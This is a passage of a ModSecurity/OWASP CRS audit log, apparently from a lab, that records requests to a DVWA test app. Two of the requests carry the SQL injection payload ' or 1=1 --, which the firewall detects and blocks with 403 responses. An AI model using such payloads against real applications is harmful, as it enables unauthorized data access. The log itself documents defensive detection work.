\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRcQhH8AAQEAAAmHBIwAAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":685,"p2":4322,"p3":170,"p4":407,"p5":97,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:20 --0400","transaction_id":"WRcQhH8AAQEAAAmHBI0AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRcQhH8AAQEAAAmHBI0AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":612,"p2":2270,"p3":248,"p4":778,"p5":152,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:25 --0400","transaction_id":"WRcQiX8AAQEAAAmHBI4AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQiX8AAQEAAAmHBI4AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":585,"p2":2456,"p3":109,"p4":610,"p5":96,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:25 --0400","transaction_id":"WRcQiX8AAQEAAAmHBI8AAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQiX8AAQEAAAmHBI8AAAAF\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":575,"p2":2153,"p3":100,"p4":375,"p5":193,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:30 --0400","transaction_id":"WRcQjn8AAQEAAAkW4RUAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQjn8AAQEAAAkW4RUAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":802,"p2":3045,"p3":0,"p4":0,"p5":120,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:33 --0400","transaction_id":"WRcQkX8AAQEAAAkW4RYAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":718,"p2":3098,"p3":0,"p4":0,"p5":203,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
